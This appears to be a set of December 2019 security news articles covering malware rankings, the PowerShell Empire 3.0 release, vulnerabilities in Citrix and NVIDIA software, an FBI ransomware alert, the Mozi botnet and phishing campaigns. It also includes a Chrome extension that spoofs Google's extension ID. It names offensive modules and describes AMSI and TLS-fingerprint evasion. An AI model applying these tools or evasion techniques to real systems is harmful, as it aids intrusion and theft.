On-air machines remained largely unaffected but some markets could not import music logs and other types of content. The company experienced connectivity problems that disabled email communication, access to files, and content for the digital platforms.

According to journalist Jerry Del Colliano (paywalled), who called this recent attack "more sphisticated," the KYW station in 1060 Philadelphia had to air program segments recorded from the overnight hours.

Considering the short time required to resume activity to a relatively normal level, it may be that the security measures installed after the attack in September paid off.

According to InsideRadio, the company lost millions of U.S. dollars to that ransomware attack, which impacted revenues and triggered investing in new security systems.

It is alleged that the attackers demanded a ransom of $500,000 to decrypt Entercom's files during the incident in September. It is unclear if the company paid or not to have their data restored.


Emotet Reigns in Sandbox's Top Malware Threats of 2019
28.12.2019 
Bleepingcomputer  Virus

Any.Run, a public service that allows interaction with malware running in a sandbox for analysis purposes, compiled a list with the top 10 most prevalent threats uploaded to the platform. At the head of the list is Emotet.

The top includes malware designed to steal all sorts of sensitive information, banking details included, and remote access tools (RAT) that allow control over a compromised host.

Annual TOP10 threats by uploads to ANYRUN!

1 #Emotet 36026
2 #AgentTesla 10324
3 #NanoCore 6527
4 #LokiBot 5693
#Ursnif 4185
#FormBook 3548
#HawkEye 3388
8 #AZORult 2898
#TrickBot 2510
#njRAT 2355https://t.co/Kx0pJYckBW

— ANY.RUN (@anyrun_app) December 23, 2019
#1 Emotet - 36,026 samples
Back in 2014 when it was first identified, Emotet was a promising banking trojan but its operators chose a different path to stay relevant in the cybercrime business.

Delivering other malware through carefully crafted malicious emails is the primary function of this threat these days. A common malware spread this way is TrickBot, a banking trojan with a shifted focus.

#2 Agent Tesla - 10,324 samples
An info-stealing program available commercially, Agent Tesla became popular among business email compromise (BEC) scammers, who use it to record keystrokes and take screenshots on the infected host.

The malware can also collect information about the system, steal data from the clipboard, and includes routines for killing running analysis processed and antivirus solutions.

#3 NanoCore - 6,527 samples
This is another tool favored by BEC scammers. NanoCore is a RAT that threat actors have used since 2013. Apart from providing remote access to a victim host, its capabilities also include keylogging, spying, file execution, capturing video and audio, editing the registry, and controlling the mouse.

NanoCore was the RAT of choice for SilverTerrier, a collective name for multiple groups engaged in BEC fraud, who created an average of 125 unique samples per month in 2018.

The developer of NanoCore was arrested in 2017 but its legacy continued through cracked versions that are still in use.

#4 LokiBot - 5,693 samples
LokiBot emerged on underground forums as an information stealer and keylogger but further development added various capabilities that allow it to evade detection and collect sensitive information.

Looking at a LokiBot sample this year, researchers noticed the following capabilities: anti-analysis, stealing data from at least 25 web browsers, checking for email and web servers running on the machine, looking for credentials in email and file transfer clients.

#5 Ursnif - 4,185 samples
This banking trojan has been around for some time and has been enriched with new features that kept it in the game.

Ursnif is typically associated with data theft but some variants come with components like backdoors, spyware, or file injection. Deploying other malware, GandCrab ransomware, is another action that researchers observed with this threat.

#6 FormBook - 3,548
Another info-stealer, FormBook also runs routines to evade antivirus detection. It's been sold on public hacking forums since at least February 2016.

This malware was designed to grab data typed in web forms, regardless of how this is done, even when a virtual keyboard or the autofill function of a password manager was.

Its functions include collecting credentials from web browsers (cookies, passwords), taking screenshots, as well as stealing clipboard content, keylogging, downloading and running executables from the command and control server, and stealing passwords from email clients.

#7 HawkEye - 3,388 samples
Another keylogger, HawkEye has been in the game since at least 2013, sold by the developer on hacking forums and dark web markets.

It maintains its keystroke interception capability but also provides new functions that allow stealing credentials from various applications and from the clipboard.

Updates for HawkEye are released regularly and advertised as an advanced monitoring solution for systems it runs on, providing data exfiltration functions.

#8 AZORult - 2,898 samples
Samples of this info-stealer have been observed in the wild since 2016 and available on underground forums for as much as $100. The original version is Delphi-based but a newer release emerged this year, written in C++.

Harvesting and exfiltrating data from a compromised system is the main purpose. This covers a wide list, though. From passwords saved in web browsers, email and FTP clients, to cookies, web forms, cryptocurrency wallets, chat history in messaging apps, and files.

#9 TrickBot - 2,510
Labeled a banking trojan for its original functionality, the TrickBot of today combines many more features than this.

It can enumerate the users on the system, get passwords in web browsers, email and FTP clients, and collect local files from the victim machine.

It is typically delivered through Emotet and can deliver other malware on the system, Ryuk ransomware being one of the notable ones, which is most likely after all useful information has been pilfered.

#10 njRAT - 2,355
This is another RAT used by the SilverTerrier threat actor. Its history is a long one and starts in 2012 and its use is predominant in the Middle East region.

Capabilities include logging keystrokes, turning on the microphone and web camera on the compromised system. Some samples also have the ability to exfiltrate the title of the current window used by the user.

Most of the malware in Any.Run's top 10 are not new on the scene. On the contrary, some of the samples are almost a decade old, yet they continue to be among the top choices for cybercriminals, proving that old dogs can still learn new tricks and companies should continue defending against known threats.


Make Your Own Google Chrome Extension to Show WWW Again
28.12.2019 
Bleepingcomputer  IT

If you are frustrated that Google Chrome no longer shows the WWW subdomain or http and https in the address bar, you can easily create your own Chrome extension that enables them again.

When Google released Chrome 76, they decided to hide the WWW "trivial subdomain" and the http and https indicators in the address bar.

WWW and https:// missing from address bar
WWW and https:// missing from address bar
When this happened, many users were upset about the change because they felt it was a security concern, is not technically accurate as www.example.com is not always the same host as example.com, and confusing for users.

Users, though, were able to enable various flags in Chrome reverted these changes. With Chrome 79, Google removed the flags and made it so that the only way you enable them again is if you installed their Suspicious Site Reporter extension.

As you can imagine, users were not happy with this situation and did not want to install a Google extension just to get back information that they felt should be shown already.

One of these frustrated users figured out how to show WWW, http, and https again by creating a custom extension that uses the same ID as the Suspicious Site Reporter extension from Google. This tricks Google Chrome into thinking their extension is installed and causes the www, http, and https to be displayed again.

Creating a custom Chrome extension to show WWW again
The good news is that its very simple to create your own extension that shows www, http, and https again in the address.

To create the custom Chrome extension, please follow these steps:

Create a new folder on your computer named chrome-www.
Open Notepad and copy the following text into it:
{
"name": "Restore URL",
"version": "1.0",
"description": "Restores http and www in the omnibox",
"key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAowA8wOUQ8ShyITJ15B9rcJrnoolyo+OLj07g8QWBlEBikgszYwlbc88OIRL+dJOASok3yG6RQ60fvIjBrtNEk1yQZJfNwF/CN0jFrkE3HN3xVMoX0XIQPB93kDZARcfR5nwU3RUgwwWGTqt69KSSU8QzRRQJSEgM8GENa3OBhw1UBn/I/RbhaFcTykJSomo9j55goJwNzUhXTJk458DQ5diY+gWMadDXlDBa8cciCVlaGOjBV5ezmxnD6p1GXhrvyEKZP8IlreDJC2Nw9hxrT3GIo1FzbmeDPANKJ9pkY1H3LOVsGJDtytBpD/FRErlvfkJVqp3N5ifF2EQ8lOAHrQIDAQAB",
"manifest_version": 2
}
Save this notepad file in the chrome-www folder as manifest.json.
Manifest.json file
Manifest.json file
Go to chrome://extensions/ and enable Developer Mode in prompt as shown below.
Enable developer mode in Chrome
Enable developer mode in Chrome
This will enable the "Load Unpacked" button, which you should click. When prompted, select the chrome-www folder your created and press Select Folder.
Select Folder
Select Folder
After pressing "Select Folder" you will now see an extension loaded in the browser called "Restore URL", which is the extension you just created.
Restore URL extension loaded
Restore URL extension loaded
You can now close the extension page and use your browser as normal.
Once the extension is loaded, you will find that Google Chrome once again shows www, http, and https in the address bar.

WWW showing again
WWW showing again
The only side-effect to this extension is that Google Chrome will now display an alert prompting you to "Disable developer mode extensions". This is a harmless alert and is being shown because of how you installed the extension in developer mode.

Developer mode extensions alert
Developer mode extensions alert
This alert will go away once you remove the custom extension or disable developer mode.


Resurrected PowerShell Empire Framework Converted to Python 3
24.12.2019 
Bleepingcomputer  IT

Hackers of all sorts are getting an early Christmas present this year in the form of a resurrected PowerShell Empire post-exploitation framework all wrapped up in Python 3.

Released in 2015, the tool was officially discontinued by its original developers on July 31. Being open-source, the framework was forked more than 1,500 times and continued to be available for anyone who wanted to still try it out.

The decision was motivated by "the security optics and improvements that have been provided by Microsoft in the past few years."

BC Security, a consulting firm specialized in the assessment of wireless networks and threat emulation for enterprise networks, still believed that the project was an asset for offensive security and forked it.

Today, the security outfit published Empire 3.0 officially along with details about the changes introduced.

Under the new wrapping
The most notable modification is the conversion to Python 3 since support for version 2.7 ends on January 1, 2020. Apart from being essential to keeping the project alive, this also ensures that Empire is still relevant to Kali Linux distribution for advanced penetration testing.

The modules incorporated also went through changes, some of them being new additions and older ones receiving a refresh that pulled them out of the Dev branch of the original PowerShell Empire framework.

Mimikatz version 2.2.0 20191125
Get-Subnet_Ranges
Get-WinUpdates
Get-KerberosServiceTicket
Invoke-RID_Hijack
Invoke-internal_monologue
Get-LAPSPasswords
Invoke-SMBLogin
Sherlock
Outlook Sandbox Evasion for Windows Macro launcher
Invoke-CredentialPhisher
Invoke-Phant0m
Get-AppLockerConfig
HostRecon
One of the significant upgrades BC Security lists for the revamped Empire is improved evasion on Windows.

"This has been achieved by updating the base launchers to remove some of the distinctive signatures that existed."

Some bugs that stood in the way of reaching new evasion levels were fixed. One of them in particular made obfuscation more difficult and alerted Windows Defender.

The bypasses for the Antimalware Scan Interface (AMSI) have been updated so that they are smaller in size and have a different signature since security suites were already triggered by them.

Adding Mimikatz 2.2.0 to the framework makes it possible to run attacks against Windows 10 versions and dump hashes, passwords, and tickets stored in the memory of this operating system.

"Another new feature is the addition of Data Protection API (DPAPI) support for Powershell PSCredential and SecureString."

Another big improvement is the implementation of JA3/S signature randomization. JA3 is a method of fingerprinting TLS handshakes that is useful for identifying malicious encrypted traffic.

In the case of JA3, modifying the signature requires administrator permission level on the compromised computer. Randomization helps hide Empire agent's communication with its command and control (C2) server. With JA3/S, admin privilege is not needed.

BC Security plans on continuing the development of the new PowerShell Empire post-exploitation framework and on expanding its feature set.

While the developers admit that PowerShell is no longer the most effective attack vector as there are methods to determine when it is aiding malicious activity, they say that the threat continues to be a realistic one.

Such exploitation toolkits, even if they are intended for penetration testers to probe the security of an organization, are also weapons of choice for real threat actors and Empire is no exception.

The unsupported version of the framework was used by Ryuk and BitPaymer ransomware operators and other advanced adversaries, such as FIN7 and Hades APT group. The new release is expected to follow a similar path.


NVIDIA Patches High Severity Vulnerability in GeForce Experience
24.12.2019 
Bleepingcomputer  Vulnerebility

NVIDIA today issued a security update for the Windows NVIDIA GeForce Experience (GFE) app designed to patch a vulnerability that could allow potential local attackers to trigger a denial of service (DoS) state or escalate privileges on systems running unpatched software.

While this security flaw requires would-be attackers to have local user access and cannot be exploited remotely, it can still be abused via malicious tools dropped remotely on systems running vulnerable NVIDIA GFE versions.

Additionally, attacks designed to exploit this vulnerability are of low complexity according to NVIDIA, require low privileges, and need no user interaction.

NVIDIA GFE is the companion software for GeForce GTX graphics cards, which "keeps your drivers up to date, automatically optimizes your game settings, and gives you the easiest way to share your greatest gaming moments with friends" according to NVIDIA,

Security issue rated as high severity
Attackers can escalate their privileges by exploiting the flaw tracked as CVE-2019-5702, thus gaining permissions beyond the ones initially granted by the system.

Successful exploitation could also enable them to render Windows machines running unpatched software unusable by triggering a denial of service state.

The CVE-2019-5702 vulnerability fixed in the December 2019 security update is detailed below, together with a full description and the CVSS V3 base score assigned by NVIDIA.

CVE Description Base Score Vector
CVE‑2019‑5702 NVIDIA GeForce Experience contains a vulnerability when GameStream is enabled in which an attacker with local system access can corrupt a system file, which may lead to denial of service or escalation of privileges. 8.4 AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H
NVIDIA says that the "risk assessment is based on an average of risk across a diverse set of installed systems and may not represent the true risk of your local installation.

The company also "recommends consulting a security or IT professional to evaluate the risk to your specific configuration."

Affected GeForce Experience versions
The software flaw impacts Windows computers running versions of NVIDIA GeForce Experience prior to 3.20.2.

"Earlier software branch releases that support this product are also affected," NVIDIA adds. "If you are using an earlier branch release, upgrade to the latest branch release."

To apply the security update, NVIDIA GeForce Experience users have to download the latest version from the GeForce Experience Downloads page released today or to launch the GFE client that will automatically apply it via the inbuilt update mechanism.

NVIDIA released security updates to fix a series of other high severity GFE flaws in May and November, that could have potentially enabled local attackers with basic user privileges to elevate privileges, trigger code execution, or perform denial-of-service (DoS) attacks against vulnerable Windows devices.


Critical Citrix Flaw May Expose Thousands of Firms to Attacks
24.12.2019 
Bleepingcomputer  Attack  Vulnerebility

A newly discovered vulnerability impacting the Citrix Application Delivery Controller (NetScaler ADC) and the Citrix Gateway (NetScaler Gateway) could potentially expose the networks of over 80,000 firms to hacking attacks.

The vulnerability, currently tracked as CVE-2019-19781, could allow remote attackers with access to a company's internal network without requiring authentication.

If successfully exploited, it leads to arbitrary code execution according to Positive Technologies' security expert Mikhail Klyuchnikov who discovered the vulnerability.

80,000 firms potentially exposed
Positive Technologies security experts determined "that at least 80,000 companies in 158 countries are potentially at risk with the top 5 countries being "the United States (the absolute leader, with over 38 percent of all vulnerable organizations), the UK, Germany, the Netherlands, and Australia."

Depending on specific configuration, Citrix applications can be used for connecting to workstations and critical business systems (including ERP). In almost every case, Citrix applications are accessible on the company network perimeter, and are therefore the first to be attacked. - Positive Technologies

While Citrix hasn't yet released new firmware to address this security issue, the company published a set of mitigation measures for standalone systems and clusters as part of this knowledge base article and it strongly recommends impacted customers to apply them as soon as possible.

"Customers should then upgrade all of their vulnerable appliances to a fixed version of the appliance firmware when released," Citrix also says.

To be alerted when updated firmware is available for the affected Citrix products, customers are also advised to subscribe to bulletin alerts here.

Affected products and platforms
According to Citrix, the CVE-2019-19781 vulnerability impacts all supported product versions and all supported platforms:

• Citrix ADC and Citrix Gateway version 13.0 all supported builds
• Citrix ADC and NetScaler Gateway version 12.1 all supported builds
• Citrix ADC and NetScaler Gateway version 12.0 all supported builds
• Citrix ADC and NetScaler Gateway version 11.1 all supported builds
• Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds
"Citrix applications are widely used in corporate networks. This includes their use for providing terminal access of employees to internal company applications from any device via the Internet," Positive Technologies's Director of Security Audit Department Dmitry Serebryannikov said.

"Considering the high risk brought by the discovered vulnerability, and how widespread Citrix software is in the business community, we recommend information security professionals take immediate steps to mitigate the threat."

The data breach
Citrix also experienced a data breach as disclosed in March 2019 by the company's Chief Security Information Officer (CSIO) Stan Black following an alert received from the FBI on March 6, 2019.

In May, Citrix confirmed that the hackers behind the breach infiltrated the company's network and stole the sensitive personal information of both former and current employees while maintaining access within Citrix internal assets for about six months.

"We believe that the cyber criminals may have accessed and or removed information relating to certain individuals who are current and former employees, as well as certain beneficiaries and dependents," Citrix said at the time.

"This information may have included, for example, names, Social Security numbers, and financial information."

The same month, a class action complaint was filed by a Citrix ex-employee for damages suffered following the security breach.

According to the class action complaint filed with the U.S. District Court Southern District of Florida, the causes of action are negligence, violations of the Florida Unfair and Deceptive Trade Practices Act, breach of implied contract, breach of fiduciary duty, and breach of confidence.


FBI Issues Alert For LockerGoga and MegaCortex Ransomware
24.12.2019 
Bleepingcomputer  BigBrothers  Ransomware

The FBI has issued a warning to private industry recipients to provide information and guidance on the LockerGoga and MegaCortex Ransomware.

Both LockerGoga and MegaCortex are ransomware infections that target the enterprise by compromising the network and then attempting to encrypt all its devices.

In an FBI Flash Alert marked as TLP:Amber and seen by BleepingComputer, the FBI is warning the private industry regarding the two ransomware infections and how they attack a network.

"Since January 2019, LockerGoga ransomware has targeted large corporations and organizations in the United States, United Kingdom, France, Norway, and the Netherlands. The MegaCortex ransomware, first identified in May 2019, exhibits Indicators of Compromise (IOCs), command and control (C2) infrastructure, and targeting similar to LockerGoga."

According to the alert, the actors behind LockerGoga and MegaCortex will gain a foothold on a corporate network using exploits, phishing attacks, SQL injections, and stolen login credentials.

Once a network is compromised, the threat actors will install the penetration testing tool called Cobalt Strike. This tool allows the attackers to deploy "beacons" on a compromised device to "create shells, execute PowerShell scripts, perform privilege escalation, or spawn a new session to create a listener on the victim system."

When a network is compromised, the actors will be resident on the network for months before they deploy the LockerGoga or MegaCortex ransomware infections.

While the FBI had not said what these attackers are doing during this period, the actors are probably exfiltrating data, deploying information-stealing trojans, and further compromising workstations and servers.

Once the network has been harvested of anything of value, the attackers will deploy the LockerGoga or MegaCortex infections so that they begin to encrypt the devices on the network. This will generate a final revenue source for the attackers.

During the ransomware deployment, the FBI states the actors will execute a kill.bat or stop.bat batch file that terminates processes and services related to security programs, disables Windows Defender scanning features, and disable security-related services.

The threat actors will also use a variety of LOLBins and legitimate software such as 7-Zip, PowerShell scripts, wmic, nslookup, adfind.exe, mstds.exe, Mimikatz, Ntsdutil.exe, and massscan.exe.

Unfortunately, both of these ransomware infections use a secure encryption algorithm, which means it is not possible to decrypt them for free.

FBI's recommended mitigations
The FBI offers guidance and mitigation advise that business owners should utilize to minimize their risk to the LockerGoga and MegaCortex ransomware.

The most important mitigation provided by the FBI is to make sure you "backup data regularly, keep offline backups, and verify integrity of backup process."

By having a working and verified backups, especially offline backups, ransomware is not a threat as you can always restore your data.

Other mitigations suggested by the FBI include:

Make sure all installed software and operating systems are kept updated. This helps to prevent vulnerabilities from being exploited by the attackers.
Enable two-factor authentication and strong passwords to block phishing attacks, stolen credentials, or other login compromises.
As publicly exposed remote desktop servers are a common way for attackers to first gain access to a network, businesses should audit logs for all remote connection protocols
Audit the creation of new accounts.
Scan for open or listening ports on the network and block them from being accessible.
Disable SMBv1 as numerous vulnerabilities and weaknesses exist in the protocol.
Monitor the organization's Active Directory and administrator group changes for unauthorized users.
Make sure you are using the most up-to-date PowerShell and uninstall any older versions.
"Enable PowerShell logging and monitor for unusual commands, especially execution of Base64 encoded PowerShell"
This guidance is general enough that it applies to all ransomware infections and should be followed by all organizations and even consumers.


Uptick Seen in ISO Email Attachments Delivering Malware
24.12.2019 
Bleepingcomputer  Spam  Virus

Security researchers analyzing malicious spam campaigns noticed an increase in delivering malware in disk image file formats, .ISO being the most prevalent.

Acting as an archive-like container, a disk image is typically a clone of a physical drive that can be mounted as a virtual disk to access data on it organized with the same file structure as the original.

Cybercriminals have been using this type of file for years but researchers at Trustwave say they observed an increase in malicious ISO this year.

Among the most popular threats delivered this way are remote access tools (NanoCore, Remcos) and LokiBot information stealer.


At 6% of all malicious attachments seen in 2019, the uptick is not spectacular but should be viewed with concern. Most secure email gateways block executable files and a malicious ISO can slip through.

Choosing ISO to deliver malware makes sense since Windows operating system has the ability to mount this file type when double-clicked. This allows scammers to disguise the threat as an innocent file.

In a recent campaign caught by Trustwave, cybercriminals created a fake FedEx shipment email message to trick recipients into downloading a malicious ISO that included an executable.

As visible in the image above, the link points to an ISO file that attempts to appear as a PDF. Inside the image was an executable for the NanoCore RAT.

At the time of the discovery, the image was marked malicious by 18 out of 70 antivirus engines on VirusTotal. NanoCore is not a new malware and normally it is easy to detect, yet packed this way lowered its detection.

It is unclear if it was a targeted attack but anyone that had indeed sent a package with FedEx would likely try to read the details in the fake PDF.

"The email was drafted in the French language, hence targeting French speakers. The lure was short and precise suggesting failure to deliver a FedEx parcel due to incorrect address, while guiding the victim to download the attached document from FedEx to update their address" - Trustwave

ISO is not the only image file abused this way. In what appears to be a targeted attack, the cybercriminals sent invoice-themed emails with an attachment in DAA (Direct Access Archive) format.

The payload, in this case, was the professional version of another remote access tool called Remcos, known for being used in cybercriminal activities.

Unlike ISO, the DAA type of image needs specialized software to be mounted and get to the files within, indicating that the crooks knew that the recipient had the necessary application installed.

According to Trustwave, the DAA images in this campaign contained a single executable with either .COM or .EXE extension, which the researchers determined to be Remcos RAT v2.5.0 Pro.

Based on observations this year, Trustwave believes that cybercriminals have started to experiment more with disk image archives to conceal their malware in a way that slips past security solutions.

With ISO being more popular and easier to unpack, threat actors tend to turn to it rather than other formats that require proprietary software to mount.

However, Trustwave believes that ISO is used for wider attacks that do not focus on a particular victim. DAA and similar image formats that require additional tools to open are reserved for targeted attacks.

The cloaking provided by disk image formats against antivirus solutions has been analyzed earlier this year by other security researchers that tested malware in tiny VHD files. In an experiment with Agent Tesla info-stealer encased in a 7MB VHD, detection rates were negligible.


New Mozi P2P Botnet Takes Over Netgear, D-Link, Huawei Routers
24.12.2019 
Bleepingcomputer  BotNet

Netgear, D-Link, and Huawei routers are actively being probed for weak Telnet passwords and taken over by a new peer-to-peer (P2P) botnet dubbed Mozi and related to the Gafgyt malware as it reuses some of its code.

Security researchers at 360 Netlab who discovered it and monitored its activities for roughly four months also found that the botnet's main purpose is to be used in DDoS attacks.

The botnet is implemented using a custom extended Distributed Hash Table (DHT) protocol based on the standard one commonly used by torrent clients and other P2P platforms to store node contact info.

This makes it faster to establish the botnet's network without the need to use servers, as well as easier to "hide the valid payload in the vast amount of normal DHT traffic so detection is impossible without proper knowledge," as 360 Netlab found.

Mozi also uses ECDSA384 and the XOR algorithm to assure the integrity and security of the botnet's components and the P2P network.

Mozi botnet
Mozi botnet (360 Netlab)
Propagation method and targeted devices
The malware uses telnet and exploits for propagation to new vulnerable devices by logging in to any targeted router or CCTV DVR that comes with a weak password, dropping and executing a payload after successfully exploiting unpatched hosts.

Once the malware is loaded on the now compromised device, the newly activated bot will automatically join the Mozi P2P network as a new node.

The next stage of the infection sees the new bot nodes receiving and executing commands from the botnet master, while also searching for and infecting other vulnerable Netgear, D-Link, and Huawei routers to add to the botnet.

"After Mozi establishes the p2p network through the DHT protocol, the config file is synchronized, and the corresponding tasks are started according to the instructions in the config file," the researchers explain.

Mozi botnet infection activity
Mozi botnet infection activity (360 Netlab)
To make sure that their botnet is not taken over by other threat actors, Mozi's operators set it up to automatically verify all commands and synced configs sent to the botnet's nodes, with only the ones passing these built-in checks being to be accepted and executed by the nodes.

The main instructions accepted by Mozi nodes are designed to:

• Launch DDoS attacks (this module reuses Gafgyt's attack code, supports HTTP, TCP, UDP, and other attacks)
• Collect and exfiltrate bot info (Bot ID, IP, PORT, filename (full path), gateway, CPU architecture)
• Execute payload from URL
• Update from the specified URL
• Execute system or bot custom commands

As the 360 Netlab researchers found while monitoring Mozi activity since September 03 when they discovered the first sample, these are the ten unpatched devices the malware will attack, infect, and add to the P2P network:

Affected Device Vulnerability
Eir D1000 Router Eir D1000 Wireless Router RCI
Vacron NVR devices Vacron NVR RCE
Devices using the Realtek SDK CVE-2014-8361
Netgear R7000 and R6400 Netgear cig-bin Command Injection
DGN1000 Netgear routers Netgear setup.cgi unauthenticated RCE
MVPower DVR JAWS Webserver unauthenticated shell command execution
Huawei Router HG532 CVE-2017-17215
D-Link Devices HNAP SoapAction-Header Command Execution
GPON Routers CVE-2018-10561, CVE-2018-10562
D-Link Devices UPnP SOAP TelnetD Command Execution
CCTV DVR CCTV/DVR Remote Code Execution
P2P botnets increasingly more common
P2P botnets like Nugache and Storm (aka Peacomm), Sality P2P, Waledac, Kelihos (aka Hlux), ZeroAccess (aka Sirefef), Miner, and Zeus P2P raised huge armies for their masters since at least the beginning of 2006 but most of them are now extinct.

Others, such as Hajime Hide 'N Seek (aka HNS), are still scanning for vulnerable devices to compromise and zombify one by one.

Hide 'N Seek, for example, grew to over 90,000 devices in just a few days in September 2018, while Hajime 'zombified' around 300,000 infected devices in about six months after being first spotted during the fall of 2016.

Even though P2P botnets are known to be highly resilient against sinkholing attacks designed to disrupt and even shut them down, there are examples such as the ZeroAccess and Kelihos that are vulnerable.

Until more details about Mozi surfaces and gets examined for potential weaknesses, the feasibility of a sinkholing attack against it is anyone's guess. Till then, Mozi has everything it needs to keep harvesting bots if the routers and other devices it targets won't be patched.

Another P2P botnet dubbed Roboto and discovered by the same research team is also scanning the Internet for Linux servers running unpatched Webmin installations since it was first spotted during late-August.

Additional information on the inner workings of this new P2P botnet and malware sample hashes are available at the end of 360 Netlab's Mozi report.


Two-Year Long Phishing Campaign Impersonates Canadian Banks
24.12.2019 
Bleepingcomputer  Phishing

Canadian banks are being impersonated in a phishing campaign targeting both individuals and businesses via a large-scale infrastructure shared with previous attacks going back to 2017 and pointing to the same attackers.

The infrastructure behind these Canadian focused attacks includes hundreds of phishing websites designed to mimic major Canadian banks' websites as part of an effort to steal user credentials from the financial institutions' clients.

To get the targets on their phishing landing pages, the attackers use custom-crafted and legitimate-looking email messages with malicious PDF attachments.

The attachments are also designed to look like official communications from the potential victim' banks, including bank logos and almost flawless grammar.

Attackers also leverage urgency-inducing language, a highly common tactic in phishing attacks, warning victims that their accounts will be locked if no action is taken within the next two days.

Sample phishing email
Sample phishing email (Check Point)
Swiping the banking credentials
In the phishing emails, the attackers ask their victims to log into their bank accounts as urgently as possible to update various accounts related information.

After the links embedded in the PDF attachments are clicked, the targets will be sent to a phishing landing page that clones the bank's real login page where they are "asked to enter their sign-in ID password in the two-factor authentication token provided by the bank."

The attackers used a quick technique to clone the banks' login pages, adding a screenshot of their website on the landing pages used to collect their victims' credentials, with text boxes on top of the login fields where the information has to be entered.

However, as the Check Point researchers that discovered this ongoing phishing campaign found, "while the victim is waiting for the request to be processed, the attackers steal those credentials and transfer money behind the scenes."

RBC phishing landing pag
RBC phishing landing page (Check Point)
Furthermore, while analyzing the current campaign, the researchers were able to spot connections to previous attacks reported in 2017 by IBM X-Force's research team, attacks that were also targeting Canadian banks' customers.

Just like in the case of the current campaign, IBM X-Force's researchers said at the time that the attacks were "designed to trick those with account access to divulge their company’s online banking credentials, one-time passwords, and two-factor authentication codes."

Additionally, they also found that "the goal of this targeted phishing attack is to take the account over and transfer money to mule accounts that the criminals control."

Targeted Canadian banks
In all, Check Point's research team was able to discover over 300 domains that closely resemble bank websites and used to host phishing websites for the following Canadian banks:

• The Royal Bank of Canada
• Scotiabank
• BMO Bank of Montreal
• Interac
• Tangerine
• Desjardins Bank
• CIBC Canadian Imperial Bank of Commerce
• TD Canada Trust
• Simplii Financial
• ATB Financial
• American Express
• Rogers Communications
• Coast Capital Savings
• Wells Fargo
More detailed information on how the attackers hosted multiple domains on the servers they controlled, as well as more examples of phishing landing pages used in these attacks, are available within Check Point's report.

Indicators of compromise (IOCs) including a list of IP addresses and phishing PDF sample hashes are also listed at the end of the report published here.


One Day, Three Credit Card Data Breach Notifications
24.12.2019 
Bleepingcomputer  Incindent

On the same day this week, two restaurants and a convenience store, all with locations across the U.S., disclosed security breach incidents that may have enabled attackers to steal customer payment card data.

In all three cases, malware designed to collect magnetic stripe data was discovered on payment processing servers for card transactions.

Wawa store, food market, coffee shop, gas pump
The most prominent on this shortlist is Wawa convenience store chain, with all its locations potentially impacted starting March 4, 2019.

Current investigation results show that exposed payment card (debit and credit) information includes numbers, expiration dates, and cardholder names.

In the data breach notification on Thursday, Wawa informs that personal identification numbers (PIN) needed for approving transactions, typically above a specific limit, were not impacted. CVVs (card validation value) used for card-not-present purchases (online shopping) also remained safe.

Wawa's security team found the malicious software on the payment processing servers on December 10 and was able to contain it by December 12. The investigation determined that the "malware began running at different points in time after March 4, 2019."

Chris Gheysens, Wawa CEO, says that none of the impacted customers will support the fraudulent charges related to the incident. Free identity protection and credit monitoring services are provided free of charge Wawa customers whose information may have been involved.

Islands restaurants
The number of Islands restaurants impacted by the PoS malware incident disclosed on the same day as Wawa is 60. Most of them are in California, other locations being in Arizona, Hawaii, and Nevada.

The restaurant was alerted of a potential payment card issue and an investigation revealed that there was a reason for concern.

Not all devices in all restaurants were compromised. A list of Islands affected locations is accessible from the breach disclosure page.

The PoS malware campaign began on February 13 and kept at it until September 27, compromising locations on various dates. It searched for data on the magnetic stripe that contained the cardholder name, card number, expiration date, and internal verification code.

Islands restaurants' notification states that malware is no longer present on payment card processing devices at its locations.

Champagne French Bakery Cafe
The restaurant announced the data breach on the same day as Wawa but details are different. Following an alert regarding PoS malware, Champagne initiated an investigation with the help of a computer forensics company.

The inspection revealed that PoS malware had been installed starting February 13 at various locations. Starting this date and continuing through September 27, "malware was installed on certain point-of-sale devices in our restaurants that were used for payment card transactions," reads the notification.

According to the official statement, eight locations were compromised and at seven of them, card data could not be extracted in some weeks in March, just like in the case of the Islands compromise.

Similar to the incident affecting Islands restaurants, the following data from the magnetic stripe was exposed: cardholder name, card number, expiration date, and internal verification code. Also, the malware did not always identify the owner's name in the payment card info, something that Islands also mentioned in their disclosure.

Neither Champagne nor Islands provide free identity protection and credit monitoring services but inform their customers once a year they can request a free copy of their credit report.


Avast and AVG Firefox Extensions Added Back to Mozilla Addons Site
24.12.2019 
Bleepingcomputer  Security

Mozilla has allowed the AVG and Avast Online Security extensions back into their addons site after the extensions reduced the amount of tracking data being sent to Avast's and AVG's servers.

The AVG Online Security and Avast Online Security extensions check if an URL the user is visiting is a malicious, phishing, or a scam site and warn the user.

At the beginning of December, Mozilla removed the Avast Online Security, AVG Online Security, Avast SafePrice, and AVG SafePrice extensions from the Firefox addons site after it was discovered that they were sending a large amount of user tracking data to Avast.

At the time, Avast told BleepingComputer that they were making changes to the extensions to meet Mozilla's requirements and that they would be available again when finished.

"Avast is working with Mozilla to resolve this issue. We have already implemented some of Mozilla's new requirements and will release further updated versions that are fully compliant and transparent per the new requirements. These will be available as usual on the Mozilla store in the near future," Avast told BleepingComputer in a statement.

In a statement to BornCity.com, Avast stated that they have reduced the amount of data sent by the Avast Online Security and AVG Online Security extensions and have also updated their privacy policies to explain exactly what is sent.

"Privacy is our top priority and the discussion about what is best practice in dealing with data is an ongoing one in the tech industry. We have never compromised on the security or privacy of personal data. We are listening to our users and acknowledge that we need to be more transparent with our users about what data is necessary for our security products to work, and to give them a choice in whether they wish to share their data further and for what purpose. We made changes to our extensions including limiting the use of data and these changes are explained clearly in our Privacy Policy. Our browser extensions Avast Online Security and AVG Online Security are back on the Chrome Store, and on the Mozilla Store (since 12/17). It’s important to us that users understand that we’re listening to concerns about transparency and data use, and striving to do better and lead by example in this area."

With these changes, the Avast Online Security and AVG Online Security extensions are back in the Mozilla addon site and will display a confirmation dialog that asks users to confirm if they wish URLs to be scanned.

Confirmation Dialog
Confirmation Dialog
Tests by BleepingComputer shows that only the URL being visited and some unknown information is being transmitted.

This is much less than the previous versions, which transmitted the page title, the referer, your OS version, your country code, whether you previously visited the page, and more.


Cisco Security Appliances Targeted for DoS Attacks via Old Bug
24.12.2019 
Bleepingcomputer  Attack  Vulnerebility

A critical vulnerability fixed in mid-2018 has been resurrected recently in denial-of-service and information disclosure attempts against Cisco's appliances Adaptive Security (ASA) and Firepower.

